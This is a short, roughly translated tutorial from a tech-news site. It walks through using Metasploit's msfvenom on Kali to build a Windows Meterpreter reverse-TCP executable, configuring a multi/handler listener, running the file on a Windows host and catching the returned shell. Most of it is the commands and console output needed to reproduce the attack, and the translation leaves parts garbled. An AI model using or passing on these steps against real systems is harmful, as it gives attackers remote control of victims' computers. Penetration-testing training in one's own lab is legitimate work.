In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Network Topology:
Kaili system version:
Note: the previous version used the msfpayload command to generate shellcode
1.kaili generates shellcode:
Root@debian:~# msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211-f exe > / root/shell.exe
()
two。 Listen for shellcode:
Msf > use exploit/multi/handler msf exploit (multi/handler) > set payload windows/meterpreter/reverse_tcppayload = > windows/meterpreter/reverse_tcpmsf exploit (multi/handler) > set lhost 192.168.152.131lhost = > 192.168.152.131msf exploit (multi/handler) > set lport 1211lport = > 1211msf exploit (multi/handler) > exploit [*] Started reverse TCP handler on 192.168.152.131
3. Upload the generated sehllcode to the windows host and run:
4. Session has already returned
Msf exploit (multi/handler) > exploit [*] Started reverse TCP handler on 192.168.152.131 Started reverse TCP handler on 1211 [*] Sending stage (179779 bytes) to 192.168.152.129 [*] Meterpreter session 1 opened (192.168.152.131) at 2018-02-24 07:58:44 + 0000
5. Successfully got shell:
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.